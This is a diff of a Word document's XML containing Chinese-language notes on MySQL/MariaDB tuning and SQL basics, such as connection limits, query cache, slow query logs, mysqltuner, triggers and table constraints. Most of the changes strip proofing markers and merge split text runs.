+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>你将收到有关</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>使用的详细报告和推荐提示</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>14.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>优化和修复</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> MySQL </w:t>
+      </w:r>
+      <w:r>
+        <w:t>数据库</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:t>有时候</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> MySQL/MariaDB </w:t>
       </w:r>
       <w:r>
-        <w:t>的使用情况。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>你可以动态地改变</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> max_connections </w:t>
-      </w:r>
-      <w:r>
-        <w:t>的值而无需重启</w:t>
-      </w:r>
-      <w:r>
-        <w:t>MySQL</w:t>
-      </w:r>
-      <w:r>
-        <w:t>服务器：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t># mysql -u root -p</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>mysql&gt; set global max_connections = 300;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>5.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>配置</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>的线程缓存数量（也就是线程池）</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>要提高服务器的性能，你可以设置</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> thread_cache_size </w:t>
-      </w:r>
-      <w:r>
-        <w:t>的值相对高一些。你可以通过以下方法来查看线程缓存命中率：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>mysql&gt; show status like 'Threads_created';</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>mysql&gt; show status like 'Connections';</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>你可以用以下公式来计算线程池的命中率：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>100 - ((Threads_created / Connections) * 100)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>如果你得到一个较低的数字，这意味着大多数</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> mysql </w:t>
-      </w:r>
-      <w:r>
-        <w:t>连接使用新的线程，而不是从缓存加载。在这种情况下，你需要增加</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> thread_cache_size </w:t>
-      </w:r>
-      <w:r>
-        <w:t>。这里有一个好处是可以动态地改变</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> thread_cache_size </w:t>
-      </w:r>
-      <w:r>
-        <w:t>而无需重启</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>服务。你可以通过以下方式来实现：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>mysql&gt; set global thread_cache_size = 16;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>6.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>禁用</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>对用户的</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> DNS </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>默认情况下当新的连接出现时，</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">MySQL/MariaDB </w:t>
-      </w:r>
-      <w:r>
-        <w:t>会进行</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> DNS </w:t>
-      </w:r>
-      <w:r>
-        <w:t>查询解析用户的</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> IP </w:t>
-      </w:r>
-      <w:r>
-        <w:t>地址</w:t>
-      </w:r>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:r>
-        <w:t>主机名。对于每个客户端连接，它的</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> IP </w:t>
-      </w:r>
-      <w:r>
-        <w:t>都会被解析为主机名。然后，主机名又被反解析为</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> IP </w:t>
-      </w:r>
-      <w:r>
-        <w:t>来验证两者是否一致。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>当</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> DNS </w:t>
-      </w:r>
-      <w:r>
-        <w:t>配置错误或服务器出现问题时，这很可能会导致延迟。这就是为什么要关闭</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> DNS </w:t>
-      </w:r>
-      <w:r>
-        <w:t>的反向查询的原因，你可以在你的配置文件中添加以下选项去设定：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>mysqld]  vim</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /etc/my.cnf</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t># Skip reverse DNS lookup of clients</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>skip-name-resolve</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>更改后你需要重启</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>服务。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>7.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>配置</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>的查询缓存容量</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>如果你有很多重复的查询并且数据不经常改变</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:t>请使用缓存查询。</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>人们常常不理解</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> query_cache_size </w:t>
-      </w:r>
-      <w:r>
-        <w:t>的实际含义而将此值设置为</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> GB </w:t>
-      </w:r>
-      <w:r>
-        <w:t>级，这实际上会降低服务器的性能。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>背后的原因是，在更新过程中线程需要锁定缓存。通常设置为</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 200-300 MB</w:t>
-      </w:r>
-      <w:r>
-        <w:t>应该足够了。如果你的网站比较小的，你可以尝试给</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 64M </w:t>
-      </w:r>
-      <w:r>
-        <w:t>并在以后及时去增加。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>在你的</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>配置文件中添加以下设置：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>query_cache_type = 1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>query_cache_limit = 256K</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>query_cache_min_res_unit = 2k</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>query_cache_size = 80M</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>8.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>配置临时表容量和内存表最大容量</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">tmp_table_size </w:t>
-      </w:r>
-      <w:r>
-        <w:t>和</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> max_heap_table_size </w:t>
-      </w:r>
-      <w:r>
-        <w:t>这两个变量的大小应该相同，它们可以让你避免磁盘写入。</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> tmp_table_size </w:t>
-      </w:r>
-      <w:r>
-        <w:t>是内置内存表的最大空间。如果表的大小超出限值将会被转换为磁盘上的</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MyISAM </w:t>
-      </w:r>
-      <w:r>
-        <w:t>表。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>这会影响数据库的性能。管理员通常建议在服务器上设置这两个值为每</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> GB </w:t>
-      </w:r>
-      <w:r>
-        <w:t>内存给</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 64M</w:t>
-      </w:r>
-      <w:r>
-        <w:t>。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>[mysqld]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>tmp_table_size= 64M</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>max_heap_table_size= 64M</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>9.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>启用</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>慢查询日志</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>记录慢查询可以帮助你定位数据库中的问题并帮助你调试。这可以通过在你的</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>配置文件中添加以下值来启用：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>slow-query-log = 1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>slow-query-log-file = /var/lib/mysql/mysql-slow.log</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>long_query_time = 1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>第一个变量启用慢查询日志，第二个告诉</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>实际的日志文件存储位置。使用</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> long_query_time </w:t>
-      </w:r>
-      <w:r>
-        <w:t>来定义完成</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>查询多少用时算长。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>10.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>检查</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>的空闲连接</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>空闲连接会消耗资源，可以的话应该被终止或者刷新。空闲连接是指处于</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> “sleep” </w:t>
-      </w:r>
-      <w:r>
-        <w:t>状态并且保持了很长一段时间的连接。你可以通过运行以下命令查看空闲连接：</w:t>
-      </w:r>
-      <w:r>
-        <w:t># mysqladmin processlist -u root -p | grep “Sleep”</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>首先你要做的就是检查代码问题并修复它。如果你不能访问正在运行的代码，你可以修改</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> wait_timeout </w:t>
-      </w:r>
-      <w:r>
-        <w:t>变量。默认值是</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 28800 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>秒，而你可以安全地将其降低到</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> 60 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t>wait_timeout=60</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>11.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>文件系统的选取</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>按照</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MariaDB </w:t>
-      </w:r>
-      <w:r>
-        <w:t>的建议，最好的文件系统是</w:t>
-      </w:r>
-      <w:r>
-        <w:t>XFS</w:t>
-      </w:r>
-      <w:r>
-        <w:t>、</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ext4 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>和</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Btrfs</w:t>
-      </w:r>
-      <w:r>
-        <w:t>。它们都是可以使用超大文件和大容量存储卷的企业级日志型文件系统。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>下面你可以找到一些关于这三个文件系统的有用信息：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>文件系统</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>XFS</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>Ext4</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>Btrfs</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>文件系统最大容量</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>8EB</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>1EB</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>16EB</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>最大文件大小</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>8EB</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>16TB</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>16EB</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>12.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>设置</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>允许的最大数据包</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>把数据拆分成包。通常一个包就是发送到客户端的一行数据。</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> max_allowed_packet </w:t>
-      </w:r>
-      <w:r>
-        <w:t>变量定义了可以被发送的最大的包。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>此值设置得过低可能会导致查询速度变得非常慢，然后你会在</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>的错误日志看到一个错误。建议将该值设置为最大包的大小。此值设置得过低可能会导致查询速度变得非常慢，然后你会在</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>的错误日志看到一个错误。建议将该值设置为最大包的大小。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>13.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>测试</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>的性能优化</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>有大量的测试工具可用，但我推荐你一个简单易用的。该工具被称为</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> mysqltuner</w:t>
-      </w:r>
-      <w:r>
-        <w:t>。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>使用下面的命令下载并运行它：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t># wget https://github.com/major/MySQLTuner-perl/tarball/master</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t># tar xf master</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t># cd major-MySQLTuner-perl-993bc18/</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve"># ./mysqltuner.pl </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>你将收到有关</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>使用的详细报告和推荐提示</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>14.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>优化和修复</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL </w:t>
-      </w:r>
-      <w:r>
-        <w:t>数据库</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:t>有时候</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> MySQL/MariaDB </w:t>
-      </w:r>
-      <w:r>
         <w:t>数据库中的表很容易崩溃，尤其是服务器意外关机、文件系统突然崩溃或复制过程中仍然访问数据库。幸运的是，有一个称为</w:t>
       </w:r>
       <w:r>
@@ -2370,13 +2310,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">systemctl start </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>mariadb.service</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>systemctl start mariadb.service</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -3003,6 +2938,11 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:t>产生并发不一致性问题主要原因是破坏了事务的隔离性</w:t>
       </w:r>
@@ -3030,8 +2970,16 @@
         </w:rPr>
         <w:t>。</w:t>
       </w:r>
-    </w:p>
-    <w:p/>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:r>
         <w:t>字段名字不可以纯数字</w:t>
@@ -3082,15 +3030,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [(none)]&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>set  innodb</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>_file_per_table on;</w:t>
+        <w:t>MariaDB [(none)]&gt; set  innodb_file_per_table on;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3100,15 +3040,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [(none)]&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>set  innodb</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>_file_per_table=1;</w:t>
+        <w:t>MariaDB [(none)]&gt; set  innodb_file_per_table=1;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3118,15 +3050,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MariaDB [(none)]&gt; </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>set  global</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> innodb_file_per_table=1;</w:t>
+        <w:t>MariaDB [(none)]&gt; set  global innodb_file_per_table=1;</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -3547,13 +3471,8 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>CREATE database zhimingdi character set utf8 collate utf8_general_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ci ;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>CREATE database zhimingdi character set utf8 collate utf8_general_ci ;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -3733,15 +3652,7 @@
         <w:t xml:space="preserve">　　　　　</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">where </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>loan.branch</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>-name = branch.branch-name)</w:t>
+        <w:t>where loan.branch-name = branch.branch-name)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3757,15 +3668,7 @@
         <w:t xml:space="preserve">　　　　　　</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">where </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>account.branch</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>-name = branch.branch-name)</w:t>
+        <w:t>where account.branch-name = branch.branch-name)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3787,40 +3690,19 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">CREATE TABLE </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>SC(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">sno </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>char(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>5),</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">cno </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>char(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>5),</w:t>
+        <w:t>CREATE TABLE SC(</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>sno char(5),</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>cno char(5),</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3832,15 +3714,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">CONSTRAINT PK_sno_cno PRIMARY </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>KEY  (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>sno,cno),</w:t>
+        <w:t>CONSTRAINT PK_sno_cno PRIMARY KEY  (sno,cno),</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3888,15 +3762,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Ssex </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>CHAR(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>2) CONSTRAINT xxxx CHECK(Ssex IN('man','male'))</w:t>
+        <w:t>Ssex CHAR(2) CONSTRAINT xxxx CHECK(Ssex IN('man','male'))</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3953,15 +3819,7 @@
         <w:ind w:firstLine="500"/>
       </w:pPr>
       <w:r>
-        <w:t>ON tbl_name FOR EACH {ROW|</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>STATEMENT }</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">ON tbl_name FOR EACH {ROW|STATEMENT } </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3988,13 +3846,8 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">after delete on </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>extmail.mailbox</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>after delete on extmail.mailbox</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -4014,15 +3867,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>delete from xiuno_bbs.bbs_user where email=</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>old.username</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>;</w:t>
+        <w:t>delete from xiuno_bbs.bbs_user where email=old.username;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4060,15 +3905,7 @@
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t>EXECUTE PROCEDURE check_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>salary(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>);</w:t>
+        <w:t>EXECUTE PROCEDURE check_salary();</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -4171,15 +4008,36 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t xml:space="preserve">  check(value condition expression) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>check(</w:t>
-      </w:r>
